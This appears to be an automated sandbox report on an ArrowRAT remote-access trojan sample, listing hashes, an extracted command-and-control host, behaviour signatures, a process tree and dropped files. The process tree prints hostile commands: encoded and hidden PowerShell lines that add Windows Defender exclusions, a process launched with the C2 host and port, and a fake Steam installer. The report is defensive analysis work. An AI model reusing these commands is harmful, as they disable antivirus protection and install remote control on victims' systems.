Overview

overview

10

Static

static

3

2be002d8f4...eb.exe

windows7-x64

10

2be002d8f4...eb.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-07-2023 01:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe

  • Size

    2.4MB

  • MD5

    6eb284564aa7bd24f4f6df02ef05d185

  • SHA1

    47f85ddc0b1a090d1852c37b2e2e1449e5b6db88

  • SHA256

    2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb

  • SHA512

    49e1a9584c74f32f9566d3c4ca31684c474ec260e50bd07b8d3c0a8ef3f3e70d10773952e5d219aa8c9076b86cddcefd242dfb91b507feeb06c5d69ba9e91179

  • SSDEEP

    49152:Wm7ZuvKRXc8DJ2c2Xp95LBO1PJNNNQzgj7k/8E54IlDXRRtdQNH:D77P2XPOxJ9FcEq4IZXRRC

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

line-ellis.gl.at.ply.gg:10735

Mutex

nAChhjAnR

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe
    "C:\Users\Admin\AppData\Local\Temp\2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4148
    • C:\Windows\Client.exe
      "C:\Windows\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1392
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1908
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
        3⤵
          PID:5044
        • C:\Windows\System32\ComputerDefaults.exe
          "C:\Windows\System32\ComputerDefaults.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4900
          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
            "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'
            4⤵
              PID:3532
        • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4020
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:1656
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:2236
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2236 -s 3972
          2⤵
          • Program crash
          PID:4924
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 468 -p 2236 -ip 2236
        1⤵
          PID:2496
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:848
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 848 -s 4012
            2⤵
            • Program crash
            PID:2668
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 500 -p 848 -ip 848
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3532
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:724
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 724 -s 2340
            2⤵
            • Program crash
            PID:1836
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 520 -p 724 -ip 724
          1⤵
            PID:2220
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:2228
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2228 -s 3564
              2⤵
              • Program crash
              PID:1716
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 420 -p 2228 -ip 2228
            1⤵
              PID:764
            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:4556
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 4556 -s 3572
                2⤵
                • Program crash
                PID:3856
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -pss -s 496 -p 4556 -ip 4556
              1⤵
                PID:3092

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log
                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                2e907f77659a6601fcc408274894da2e

                SHA1

                9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                SHA256

                385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                SHA512

                34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GSP6GPKD\microsoft.windows[1].xml
                Filesize

                97B

                MD5

                fe944d229104fea0759b99572bfec403

                SHA1

                70c6bf4e77dd02eacd2858d7f94487ff93b2489d

                SHA256

                c25bf7a411aa32b9de9dbe0d00368a63a733699a36a7468471825de5459e4b29

                SHA512

                ff0f95f1d17b4e91c86b3ebab8a620303c2d7429fc3072352994d04795a7ec5cc6d2ad378349e7ec8160625ca72345fbcd12d30ef8ad09c76b5792d92f4f68bc

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133328650290517073.txt
                Filesize

                76KB

                MD5

                1813dd442ceacc789193d494f5950c47

                SHA1

                aefaec9cba5ee871851ce3fc2f2e5a00e3373f19

                SHA256

                d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97

                SHA512

                838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133328650290517073.txt
                Filesize

                76KB

                MD5

                1813dd442ceacc789193d494f5950c47

                SHA1

                aefaec9cba5ee871851ce3fc2f2e5a00e3373f19

                SHA256

                d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97

                SHA512

                838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GSP6GPKD\microsoft.windows[1].xml
                Filesize

                97B

                MD5

                fe944d229104fea0759b99572bfec403

                SHA1

                70c6bf4e77dd02eacd2858d7f94487ff93b2489d

                SHA256

                c25bf7a411aa32b9de9dbe0d00368a63a733699a36a7468471825de5459e4b29

                SHA512

                ff0f95f1d17b4e91c86b3ebab8a620303c2d7429fc3072352994d04795a7ec5cc6d2ad378349e7ec8160625ca72345fbcd12d30ef8ad09c76b5792d92f4f68bc

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GSP6GPKD\microsoft.windows[1].xml
                Filesize

                97B

                MD5

                fe944d229104fea0759b99572bfec403

                SHA1

                70c6bf4e77dd02eacd2858d7f94487ff93b2489d

                SHA256

                c25bf7a411aa32b9de9dbe0d00368a63a733699a36a7468471825de5459e4b29

                SHA512

                ff0f95f1d17b4e91c86b3ebab8a620303c2d7429fc3072352994d04795a7ec5cc6d2ad378349e7ec8160625ca72345fbcd12d30ef8ad09c76b5792d92f4f68bc

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GSP6GPKD\microsoft.windows[1].xml
                Filesize

                97B

                MD5

                fe944d229104fea0759b99572bfec403

                SHA1

                70c6bf4e77dd02eacd2858d7f94487ff93b2489d

                SHA256

                c25bf7a411aa32b9de9dbe0d00368a63a733699a36a7468471825de5459e4b29

                SHA512

                ff0f95f1d17b4e91c86b3ebab8a620303c2d7429fc3072352994d04795a7ec5cc6d2ad378349e7ec8160625ca72345fbcd12d30ef8ad09c76b5792d92f4f68bc

                Download Submit

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GSP6GPKD\microsoft.windows[1].xml
                Filesize

                97B

                MD5

                fe944d229104fea0759b99572bfec403

                SHA1

                70c6bf4e77dd02eacd2858d7f94487ff93b2489d

                SHA256

                c25bf7a411aa32b9de9dbe0d00368a63a733699a36a7468471825de5459e4b29

                SHA512

                ff0f95f1d17b4e91c86b3ebab8a620303c2d7429fc3072352994d04795a7ec5cc6d2ad378349e7ec8160625ca72345fbcd12d30ef8ad09c76b5792d92f4f68bc

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
                Filesize

                2.2MB

                MD5

                70f3bc193dfa56b78f3e6e4f800f701f

                SHA1

                1e5598f2de49fed2e81f3dd8630c7346a2b89487

                SHA256

                3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                SHA512

                3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
                Filesize

                2.2MB

                MD5

                70f3bc193dfa56b78f3e6e4f800f701f

                SHA1

                1e5598f2de49fed2e81f3dd8630c7346a2b89487

                SHA256

                3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                SHA512

                3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
                Filesize

                2.2MB

                MD5

                70f3bc193dfa56b78f3e6e4f800f701f

                SHA1

                1e5598f2de49fed2e81f3dd8630c7346a2b89487

                SHA256

                3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                SHA512

                3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srv04oe0.2d0.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\nscB344.tmp\System.dll
                Filesize

                11KB

                MD5

                a4dd044bcd94e9b3370ccf095b31f896

                SHA1

                17c78201323ab2095bc53184aa8267c9187d5173

                SHA256

                2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

                SHA512

                87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\nscB344.tmp\nsDialogs.dll
                Filesize

                9KB

                MD5

                0d45588070cf728359055f776af16ec4

                SHA1

                c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                SHA256

                067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                SHA512

                751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\nscB344.tmp\nsDialogs.dll
                Filesize

                9KB

                MD5

                0d45588070cf728359055f776af16ec4

                SHA1

                c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                SHA256

                067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                SHA512

                751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

                Download Submit

              • C:\Windows\Client.exe
                Filesize

                158KB

                MD5

                d7dea9816b882cb53d615a3afdf0c955

                SHA1

                d3bfd91ff74c072028bd747d4f56f17cc55168a5

                SHA256

                96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                SHA512

                b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                Download Submit

              • C:\Windows\Client.exe
                Filesize

                158KB

                MD5

                d7dea9816b882cb53d615a3afdf0c955

                SHA1

                d3bfd91ff74c072028bd747d4f56f17cc55168a5

                SHA256

                96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                SHA512

                b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                Download Submit

              • C:\Windows\Client.exe
                Filesize

                158KB

                MD5

                d7dea9816b882cb53d615a3afdf0c955

                SHA1

                d3bfd91ff74c072028bd747d4f56f17cc55168a5

                SHA256

                96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                SHA512

                b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                Download Submit

              • memory/724-299-0x0000027043920000-0x0000027043940000-memory.dmp

                Filesize

                128KB

                Download

              • memory/724-305-0x0000027043F00000-0x0000027043F20000-memory.dmp

                Filesize

                128KB

                Download

              • memory/724-301-0x00000270438E0000-0x0000027043900000-memory.dmp

                Filesize

                128KB

                Download

              • memory/848-279-0x000002B7C92B0000-0x000002B7C92D0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/848-277-0x000002B7C92F0000-0x000002B7C9310000-memory.dmp

                Filesize

                128KB

                Download

              • memory/848-281-0x000002B7C98C0000-0x000002B7C98E0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/1392-148-0x0000020CA2FE0000-0x0000020CA300E000-memory.dmp

                Filesize

                184KB

                Download

              • memory/1392-198-0x0000020CA3410000-0x0000020CA3420000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1392-150-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1392-254-0x0000020CA3410000-0x0000020CA3420000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1392-224-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1908-234-0x0000000002FB0000-0x0000000002FB1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2228-320-0x0000019892FD0000-0x0000019892FF0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2228-322-0x0000019892F90000-0x0000019892FB0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2228-324-0x00000198933A0000-0x00000198933C0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2236-244-0x0000017545CA0000-0x0000017545CC0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2236-242-0x0000017545680000-0x00000175456A0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2236-240-0x00000175456C0000-0x00000175456E0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/3532-219-0x000001B1D26D0000-0x000001B1D26E0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3532-230-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3532-220-0x000001B1D26D0000-0x000001B1D26E0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3532-226-0x000001B1D26D0000-0x000001B1D26E0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3532-218-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4148-196-0x000001B8B8560000-0x000001B8B8582000-memory.dmp

                Filesize

                136KB

                Download

              • memory/4148-225-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4148-164-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4148-166-0x000001B8B82B0000-0x000001B8B82C0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4148-221-0x000001B8B82B0000-0x000001B8B82C0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4148-203-0x000001B8B82B0000-0x000001B8B82C0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4148-171-0x000001B8B82B0000-0x000001B8B82C0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4280-133-0x0000000000E70000-0x00000000010D0000-memory.dmp

                Filesize

                2.4MB

                Download

              • memory/4280-163-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4280-134-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4280-135-0x00007FFB34410000-0x00007FFB34ED1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4280-136-0x000000001BCF0000-0x000000001BD00000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4556-343-0x000002229E390000-0x000002229E3B0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/4556-345-0x000002229E7A0000-0x000002229E7C0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/4556-341-0x000002229E3D0000-0x000002229E3F0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/5044-185-0x00000000050E0000-0x000000000517C000-memory.dmp

                Filesize

                624KB

                Download

              • memory/5044-231-0x0000000073D00000-0x00000000744B0000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/5044-233-0x00000000052A0000-0x00000000052B0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/5044-160-0x0000000000400000-0x0000000000418000-memory.dmp

                Filesize

                96KB

                Download

              • memory/5044-204-0x0000000006100000-0x0000000006150000-memory.dmp

                Filesize

                320KB

                Download

              • memory/5044-183-0x0000000004FC0000-0x0000000005052000-memory.dmp

                Filesize

                584KB

                Download

              • memory/5044-199-0x0000000005A50000-0x0000000005FF4000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/5044-186-0x0000000073D00000-0x00000000744B0000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/5044-200-0x0000000005810000-0x0000000005876000-memory.dmp

                Filesize

                408KB

                Download

              • memory/5044-197-0x00000000052A0000-0x00000000052B0000-memory.dmp

                Filesize

                64KB

                Download